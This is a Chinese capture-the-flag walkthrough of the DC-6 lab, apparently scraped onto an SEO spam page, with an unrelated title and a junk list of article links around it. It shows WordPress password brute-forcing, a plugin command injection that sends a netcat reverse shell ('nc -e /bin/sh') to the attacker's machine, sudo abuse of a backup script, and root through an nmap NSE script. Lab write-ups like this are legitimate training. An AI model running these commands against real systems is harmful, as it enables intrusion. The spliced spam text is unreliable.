当前位置: 首页 > news >正文

软件开发的模式沈阳seo优化

软件开发的模式,沈阳seo优化,网站后台文字编辑器,网站关键词优化费用文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip kali:192.168.144.148 DC-6:192.168.144.154 靶机描述:选择带k01的密码后面会用到 访问192.168.144.154&…

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip
kali:192.168.144.148
DC-6:192.168.144.154

靶机描述:选择带k01的密码后面会用到
在这里插入图片描述

访问192.168.144.154,地址栏上方的ip变成了域名http://wordy,添加host文件
在这里插入图片描述


二、渗透流程

nmap -A -T5 -sV -sT -p- 192.168.144.154

在这里插入图片描述

思路:
1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……

目录扫描结果:
http://wordy/wp-login.php		#后台管理页面
http://wordy/wp-includes/		#网站目录
#指纹探测
whatweb  http://wordy

在这里插入图片描述

思路:web站点是Wordpress CMS

1、Wordpress版本漏洞
2、Wordpress插件漏洞
3、后台地址,账号密码爆破

#枚举网站用户
wpscan --url http://wordy -e u

在这里插入图片描述

#利用枚举到的网站用户名进行爆破
#筛选出有k01的密码保存到新的字典passwords.txt中
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy  -U "admin","mark","jens","sarch","graham" -P passwords.txt

在这里插入图片描述

#ssh登录失败
ssh mark@192.168.144.154

在这里插入图片描述

登录后台管理页面
用户名:密码     mark:helpdesk01
管理页面地址:http://wordy/wp-login.php

在这里插入图片描述

#Activity monitor组件
searchsploit activity monitor
#后两个命令注入和远程代码执行都可以加以利用

在这里插入图片描述

#查看45274.html
命令1:cat /usr/share/exploitdb/exploits/php/webapps/45274.html
命令2:file:///usr/share/exploitdb/exploits/php/webapps/45274.html
#修改45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html  45274.html
vim 45274.html
#修改为如下内容

在这里插入图片描述

#kali开启监听
nc -lnvp 4444
#浏览器访问45274.html,点击submit,反弹shell未成功

在这里插入图片描述

点击Lookup按钮,抓包

在这里插入图片描述

#burpsuite抓包
修改命令为127.0.0.1 | nc -e /bin/sh 192.168.144.148 4444
反弹shell成功

在这里插入图片描述在这里插入图片描述

#利用python切换到bash环境
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

cat /home/mark/stuff/things-to-do.txt
#该文件下存在账号密码:graham - GSo7isUM1D4

在这里插入图片描述

#利用获取的账号密码登录
ssh graham@192.168.144.154

在这里插入图片描述

sudo -l
cat /home/jens/backups.sh
#backups.sh文件内容是对网站的打包命令,作用是备份网站根目录。

在这里插入图片描述

sudo -l
#jens用户不需要密码就可以执行backups.sh文件

在这里插入图片描述

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述

sudo -l		#显示当前用户可以用sudo执行哪些命令
#在jens的shell下,可以在不需要密码的情况下,以root的身份权限执行nmap
#利用nmap的--script参数执行反弹shell脚本
echo 'os.execute("/bin/sh")' > getShell.nse
sudo nmap --script=./getshell.nse

在这里插入图片描述

这里有个问题:获取到root权限之后,页面输入的命令看不见,但是可以执行。
在这里插入图片描述


三、思路总结

1、信息收集
2、暴力破解登录Wordpress后台
3、利用Wordpress CMS组件漏洞反弹shell
4、ssh远程登录后寻找可以执行sudo命令的操作
5、写入nmap反弹shell脚本

http://www.hkea.cn/news/254195/

相关文章:

  • 啥网站都能看的浏览器下载百度收录查询工具
  • 福田附近公司做网站建设哪家效益快奶糖 seo 博客
  • 临沂免费自助建站模板品牌整合营销
  • iis做本地视频网站找客户资源的网站
  • 做调查用哪个网站网络推广有多少种方法
  • 开发一个交易网站多少钱在线工具
  • 网站平台怎么建立的软文范例
  • 移动应用开发专业学什么东莞seo软件
  • 做宣传网站的公司手机百度极速版app下载安装
  • 私人可以做慈善网站吗外贸如何推广
  • 网站页面模板页面布局如何成为百度广告代理商
  • 瑞安外贸网站建设曲靖百度推广
  • 先做网站还是服务器销售营销方案100例
  • 用卫生纸做的礼物街网站免费网页空间到哪申请
  • 手游网站做cpc还是cpm广告号厦门网页搜索排名提升
  • 人个做外贸用什么网站好宁波百度seo点击软件
  • 诈骗网站怎么做的企业网站seo案例分析
  • 如何做网站接口湖南营销型网站建设
  • 进入兔展网站做PPt软文营销ppt
  • app网站新闻危机公关
  • 东莞关键词优化实力乐云seo南宁seo外包服务商
  • 做网站都是用源码么免费注册个人网站不花钱
  • 建设网站需要两种服务支持官网设计公司
  • 安庆做网站seo建站收费地震
  • 绵阳住房和城市建设局网站官网seo排名优化联系13火星软件
  • 网站开发建设费用关键词异地排名查询
  • 网站建设企业电话广州优化疫情防控举措
  • 重庆模板网站建设百度网站域名注册
  • 安徽建设厅网站地址网络广告推广方式
  • 门户网站内容管理建设方案企业关键词优化推荐